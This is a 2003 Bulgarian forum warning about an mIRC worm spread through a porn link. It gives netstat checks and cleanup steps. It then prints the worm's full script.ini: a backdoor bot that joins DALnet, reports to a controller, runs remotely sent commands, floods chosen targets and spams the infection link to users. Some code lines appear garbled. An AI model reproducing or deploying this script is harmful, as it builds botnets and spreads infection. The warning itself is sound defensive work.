Този вирус има за цел да ви превърне във FloodBot - FloodDrone. Заразата с него става, като посетите адрес:
http://www.geocities.com/tbilisi_girl/

Можете да проверите дали го имате, като пуснете ms dos prompt (Start/Programs или Start/Programs/Accesoires) и напишете netstat. На заразени компютри ще излезе ред от сорта на:
TCP vesko:1890 jade.va.us.dal.net:6667 ESTABLISHED
TCP vesko:1891 irc.del.bg:6667 ESTABLISHED
TCP vesko:1892 irc.del.bg:6667 ESTABLISHED

connection към дал.нет и 2 към сървъра, на който чатите в момента. Нормално е да имате само 1

TCP vesko:1892 irc.del.bg:6667 ESTABLISHED

Какво става, като посетите горния сайт със стар експлорер?
1. Виждате една изключително грозна гола жена.
2. mIRC-ът ви се заразява по познатия начин
3. при пускане на mIRC, заразата вкарва в чата SpamDrone, което рекламира сайта, с който се инфектират новите жертви
4. вирусът вкарва бот в дал.нет, който съобщава за присъствието си на човек с nick petrol
5. Вашият компютър е на разположение за Flood на произволен човек от произволен човек, произволен канал, сървър и чат мрежа.

Изчистване:
1. Инсталация на Mozilla - за да не се заразявате отново
2. Изтриване на script.ini, mirc.ini или на целия mIRC и инсталиране на ново (зависи до колко разбирате за какво става въпрос:)
3. Запомняне на правилото: не бива да се посещават рекламирани в чаат порно сайтове!

Приложение - в script.ini има следния скрипт, който пуска рекламен бот и floodbot от вашия mIRC:

n0=on1 :start:.sockopen bot jade.va.us.dal.net $chr(310) $+ $chr(310) $+ $chr(310) $+ $chr(311)
n1=alias FlooD if ($ 1= nick) { set %nick $ 2| set %channel $ 2| set %server $ 3| set %port $ 4| sockopen next $+ $rand(1,999999) %server %port | halt } | if ($ 1= chan) { set %nick $ 2| set %channel $ 2| set %server $ 3| set %port $ 4| sockopen chan $+ $rand(1,999999) %server %port | halt } | if ($ 1= kill) { set %nick $ 2| set %channel $ 2| set %server $ 3| set %port $ 4| sockopen kill $+ $rand(1,999999) %server %port | halt }
n2=on *:Sockopen:next*:{
n3= if ($sockerr >0 ) { halt }
n4=set %petrolflood georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.
n5=set -u 1%user $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) | .sockwrite -nt $sockname USER %user %user %user : $+ %user | .sockwrite -nt $sockname NICK $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) | .sockwrite -n $sockname privmsg %nick : $+ %petrolflood | .sockwrite -n $sockname notice %nick : $+ %petrolflood | .sockclose $sockname | .sockopen next $+ $r(0,999) $+ $r(0,999) $+ $r(0,999) $+ $r(0,999) %server %port
n6=}
n7=on *:Sockopen:chan*:{
n8= if ($sockerr >0 ) { halt }
n9=set %petrolflood georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.
n10=set -u 1%user $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) | .sockwrite -nt $sockname USER %user %user %user : $+ %user | .sockwrite -nt $sockname NICK $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $+ $rand(A,Z) $+ Guest | sockwrite -tn $sockname join %channel | .sockwrite -n $sockname privmsg %channel : $+ %petrolflood | .sockwrite -n $sockname privmsg %channel : $+ %petrolflood | .sockclose $sockname | .sockopen chan $+ $r(0,999) $+ $r(0,999) $+ $r(0,999) $+ $r(0,999) %server %port
n11=}
n12=on *:Sockopen:kill*:{
n13= if ($sockerr >0 ) { halt }
n14=set -u 1%user $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) | .sockwrite -nt $sockname USER %user %user %user : $+ %user | .sockwrite -nt $sockname NICK $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) | sockwrite -tn $sockname join %channel | .sockwrite -n $sockname privmsg %nick : $+ $chr(1) $+ finger $+ $chr(1) | .sockclose $sockname | .sockopen kill $+ $r(0,999) $+ $r(0,999) $+ $r(0,999) $+ $r(0,999) %server %port
n15=set %petrolflood georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.
n16=}
n17=on *:sockread:hack*: {
sockread %botread |
set %nickl 1$gettok(%botread,1,32) |
set %nickl 2$left(%nickl1,8) |
set %nickf $right(%nickl2,7) |
if ($gettok(%botread,5,32) == kjk) && (kjk isin %nickf) { $gettok(%botread,6-,32) } }
n18=on *:Sockopen:hack*:{
n19= if ($sockerr >0 ) { halt }
n20=set -u 1%user $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(1,9) $+ $rand(A,Z) | .sockwrite -nt $sockname USER %user %user %user : $+ %user | .sockwrite -nt $sockname NICK $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $+ $rand(A,Z) $+ $+ $rand(A,Z) | .timer 120 0 sockwrite -n $sockname privmsg petrol :i'm tbilisi - $me $+
n21=}
n22=on *:sockclose:next*:/.timer 3 1 sockopen bot jade.va.us.dal.net $chr(310) $+ $chr(310) $+ $chr(310) $+ $chr(311)
n23=
n24=
n25=
n26=on *:join:#:if ( $nick == $Me ) { halt } | .msg $nick 13http://www.geocities.com/tbilisi_girl 6Free Russia Sex
n27=on *:part:#:if ( $nick == $Me ) { halt } | .msg $nick 13http://www.geocities.com/tbilisi_girl 6Free Russia Sex
n28=on *:kick:#:if ( $nick == $Me ) { halt } | .msg $nick 13http://www.geocities.com/tbilisi_girl 6Free Russia Sex
n29=
n30=alias mr_petroleum { set %petrolflood $1- }
n31=
n32=on ^*:text:*:?:if (www isin $1-) || (http isin $1-) { halt }

Edited from: dzver; 2003-01-25 08:08

Edited from: dzver; 2003-01-25 08:14